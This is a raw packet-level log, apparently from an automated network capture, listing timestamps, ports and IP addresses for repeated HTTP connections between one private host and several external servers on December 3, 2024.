                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480047941 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.480120897 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.583085060 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.583127975 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.583375931 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624552011 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624597073 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624752045 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.624995947 CET8049794172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:51.625226974 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:52.982019901 CET4979480192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:53.998038054 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.100898981 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.101116896 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.103291988 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.206059933 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.362303019 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.362385035 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.362644911 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.363557100 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.363734961 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.364295959 CET4979580192.168.11.20172.67.201.49
                                                                                                                                                                                                                                Dec 3, 2024 14:53:54.466988087 CET8049795172.67.201.49192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.489895105 CET4979680192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.628588915 CET8049796173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.628768921 CET4979680192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.631959915 CET4979680192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.770838976 CET8049796173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.878046989 CET8049796173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.878057957 CET8049796173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.878230095 CET4979680192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:01.136446953 CET4979680192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.152610064 CET4979780192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.291944027 CET8049797173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.292159081 CET4979780192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.295325041 CET4979780192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.434104919 CET8049797173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.514297962 CET8049797173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.514343023 CET8049797173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:02.514483929 CET4979780192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:03.807713985 CET4979780192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.823813915 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.962996006 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.963164091 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.969482899 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:04.969508886 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.108434916 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.108449936 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.108741999 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.108756065 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.199466944 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.199481010 CET8049798173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:05.199743986 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:06.479120970 CET4979880192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.495105028 CET4979980192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.633935928 CET8049799173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.634166002 CET4979980192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.636315107 CET4979980192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.775127888 CET8049799173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.868633032 CET8049799173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.868678093 CET8049799173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.869168997 CET4979980192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:07.872179985 CET4979980192.168.11.20173.0.157.187
                                                                                                                                                                                                                                Dec 3, 2024 14:54:08.011110067 CET8049799173.0.157.187192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.002243042 CET4980080192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.112534046 CET804980013.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.112719059 CET4980080192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.115884066 CET4980080192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.225332975 CET804980013.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.225583076 CET804980013.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.225774050 CET4980080192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:14.617911100 CET4980080192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:14.728827953 CET804980013.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.633907080 CET4980180192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.746679068 CET804980113.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.746999025 CET4980180192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.750148058 CET4980180192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.860821009 CET804980113.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.860836029 CET804980113.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:15.860992908 CET4980180192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:17.257853985 CET4980180192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:17.367849112 CET804980113.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.273977041 CET4980280192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.383266926 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.383435011 CET4980280192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386698008 CET4980280192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386756897 CET4980280192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.386825085 CET4980280192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495174885 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495189905 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495223045 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495496035 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:18.495511055 CET804980213.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:20.914105892 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.027818918 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.028052092 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.030231953 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.140487909 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.141648054 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.141664028 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.142002106 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.142600060 CET4980380192.168.11.2013.248.169.48
                                                                                                                                                                                                                                Dec 3, 2024 14:54:21.252326012 CET804980313.248.169.48192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.295648098 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.420061111 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.420244932 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.423396111 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.547655106 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872312069 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872333050 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872349977 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872364044 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872391939 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872394085 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872406960 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872423887 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872438908 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872453928 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872473001 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872560024 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.872694016 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997052908 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997078896 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997267962 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997330904 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997355938 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997375011 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997391939 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997416973 CET8049804192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997509956 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.997596025 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:27.934722900 CET4980480192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:28.943514109 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.068149090 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.068356037 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.071538925 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.195846081 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582056046 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582078934 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582094908 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582109928 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582124949 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582139969 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582151890 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582168102 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582362890 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582367897 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582389116 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.582530022 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706891060 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706913948 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706928968 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.706943989 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707015038 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707185030 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707214117 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707232952 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707247972 CET8049805192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:29.707528114 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:30.583111048 CET4980580192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.599364996 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.723675013 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.723896980 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727149010 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727176905 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.727252007 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.851893902 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:31.851913929 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164474964 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164496899 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164513111 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164534092 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164556980 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164572954 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164731026 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164779902 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164798975 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164799929 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164815903 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164830923 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.164992094 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.165019989 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289707899 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289757013 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289793968 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289829016 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289865971 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289901018 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289932013 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.289936066 CET8049806192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.290069103 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:32.290069103 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:33.238775969 CET4980680192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.254841089 CET4980780192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.379246950 CET8049807192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.379458904 CET4980780192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.381623030 CET4980780192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.505923986 CET8049807192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.634823084 CET8049807192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.635627031 CET8049807192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.635787964 CET4980780192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.636378050 CET4980780192.168.11.20192.185.147.100
                                                                                                                                                                                                                                Dec 3, 2024 14:54:34.760852098 CET8049807192.185.147.100192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.921709061 CET4980880192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.110055923 CET8049808176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.110277891 CET4980880192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.113451004 CET4980880192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.301781893 CET8049808176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809576035 CET8049808176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809627056 CET8049808176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809663057 CET8049808176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:40.809850931 CET4980880192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:41.627537966 CET4980880192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:42.643713951 CET4980980192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:42.833076000 CET8049809176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:42.833307981 CET4980980192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:42.836472988 CET4980980192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.026462078 CET8049809176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031315088 CET8049809176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031544924 CET8049809176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031575918 CET8049809176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:43.031819105 CET4980980192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:44.345649958 CET4980980192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.361743927 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.550718069 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.550973892 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.554203987 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.554270029 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.743464947 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.743509054 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.743635893 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.743684053 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.743948936 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.758339882 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.758408070 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.758626938 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.760283947 CET8049810176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:45.760459900 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:47.063839912 CET4981080192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.079900980 CET4981180192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.268035889 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.268295050 CET4981180192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.270658016 CET4981180192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.458714962 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464325905 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464380026 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464413881 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.464694977 CET4981180192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.465382099 CET4981180192.168.11.20176.31.209.107
                                                                                                                                                                                                                                Dec 3, 2024 14:54:48.653459072 CET8049811176.31.209.107192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.074805021 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.386204004 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.386370897 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.389543056 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.700037003 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702064991 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702116966 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702321053 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702361107 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702370882 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702406883 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702442884 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702477932 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702512980 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702545881 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702581882 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702594042 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702594042 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702708960 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.702742100 CET4981280192.168.11.2045.197.47.177
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.012851954 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.012902975 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.012938023 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.012973070 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013006926 CET804981245.197.47.177192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:55.013041973 CET804981245.197.47.177192.168.11.20
